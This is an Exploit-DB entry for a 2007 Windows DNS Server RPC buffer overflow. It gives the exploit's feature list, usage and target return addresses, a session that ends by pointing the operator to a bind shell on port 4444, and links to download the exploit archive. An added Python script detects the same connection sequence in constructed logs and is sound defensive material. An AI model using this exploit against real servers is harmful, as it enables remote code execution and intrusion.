Microsoft Windows - DNS RPC Remote Buffer Overflow (2)

EDB-ID: 3746
Platform: Windows
Published: 2007-04-18

  Exploit v2 features:
  - Target remote port 445 (by default, but requires auth)
  - Manual target for dynamic TCP port (without auth)
  - Automatic search for dynamic DNS RPC port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 Server and Windows 2003 Server (Spanish) supported by default
  - Fixed bug with Windows 2003 shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote Win2k English and Italian (not tested, found with the Metasploit opcode database; please report your own)
  - Microsoft RPC API used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
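The session above shows the network footprint a defender can look for without any knowledge of the payload: an RPC endpoint mapper lookup on TCP 135 against a DNS server, a follow-up connection from the same client to the dynamic high port the mapper returned (1105 here), and then a connection to TCP 4444 on that server. The script below is an added example, not part of the Exploit-DB entry or the exploit authors' code; it replays that three-step pattern over constructed firewall-style log lines. The log format, the field layout, the 60-second window and the sample records are assumptions made for the example, and a real deployment would key the mapper-to-dynamic-port correlation on the interface UUID (50abc2a4-574d-40b3-9d66-ee4fd5fba076 in the session), which needs a protocol decoder this example does not include.

```python
"""
Added example (not from the Exploit-DB entry or the exploit authors):
detect the endpoint-mapper -> dynamic RPC port -> TCP 4444 sequence
against a known DNS server in constructed connection logs.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed log lines, one per accepted connection:
#   "<epoch> <src_ip> <dst_ip> <dst_port> <action>"
SAMPLE_LOG = """\
1176900000 10.0.0.7 192.168.1.2 135 allow
1176900001 10.0.0.7 192.168.1.2 1105 allow
1176900004 10.0.0.7 192.168.1.2 4444 allow
1176900100 10.0.0.9 192.168.1.2 53 allow
1176900101 10.0.0.9 192.168.1.2 135 allow
1176900102 10.0.0.9 192.168.1.2 1200 allow
1176900200 10.0.0.9 192.168.1.2 1200 deny
"""

EPM_PORT = 135             # RPC endpoint mapper, queried in the session above
SHELL_PORT = 4444          # port the session tells the operator to connect to
DYNAMIC_PORT_MIN = 1025    # Windows 2000/2003 dynamic RPC ports start here
WINDOW_SECONDS = 60        # assumed maximum gap between consecutive steps


@dataclass
class Conn:
    ts: int
    src: str
    dst: str
    dport: int


def parse_log(text):
    """Parse the constructed log format; malformed or denied lines are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, dport, action = parts
        if action != "allow":
            continue  # only completed connections matter for this sequence
        conns.append(Conn(int(ts), src, dst, int(dport)))
    return conns


def find_suspicious(conns, dns_servers):
    """Return (src, dst, dynamic_port, shell_ts) for every client that hit the
    endpoint mapper, then a dynamic port, then port 4444 on a DNS server,
    each step within WINDOW_SECONDS of the previous one.

    Simplification: all three steps are correlated on the same (src, dst)
    pair, so a shell connection from a different client is not matched."""
    by_pair = defaultdict(list)
    for c in conns:
        if c.dst in dns_servers:
            by_pair[(c.src, c.dst)].append(c)

    hits = []
    for (src, dst), flows in by_pair.items():
        flows.sort(key=lambda c: c.ts)
        epm_ts = None   # time of the last endpoint mapper query
        dyn = None      # dynamic-port connection that followed it
        for c in flows:
            if c.dport == EPM_PORT:
                epm_ts = c.ts
            elif (epm_ts is not None and c.dport >= DYNAMIC_PORT_MIN
                  and c.dport != SHELL_PORT
                  and c.ts - epm_ts <= WINDOW_SECONDS):
                dyn = c
            elif (dyn is not None and c.dport == SHELL_PORT
                  and c.ts - dyn.ts <= WINDOW_SECONDS):
                hits.append((src, dst, dyn.dport, c.ts))
                dyn = None  # report each dynamic-port connection once
    return hits


if __name__ == "__main__":
    for src, dst, dport, ts in find_suspicious(parse_log(SAMPLE_LOG), {"192.168.1.2"}):
        print(f"[!] {src} -> {dst}: EPM lookup, dynamic port {dport}, then 4444 at {ts}")
```

Only the first client (10.0.0.7) completes all three steps; 10.0.0.9 queries the mapper and a dynamic port, which is ordinary RPC client behaviour, and is not reported. Blocking TCP 135 and the dynamic RPC range from untrusted networks removes the unauthenticated path the feature list describes, leaving only the authenticated port 445 route.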


Also available at:

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]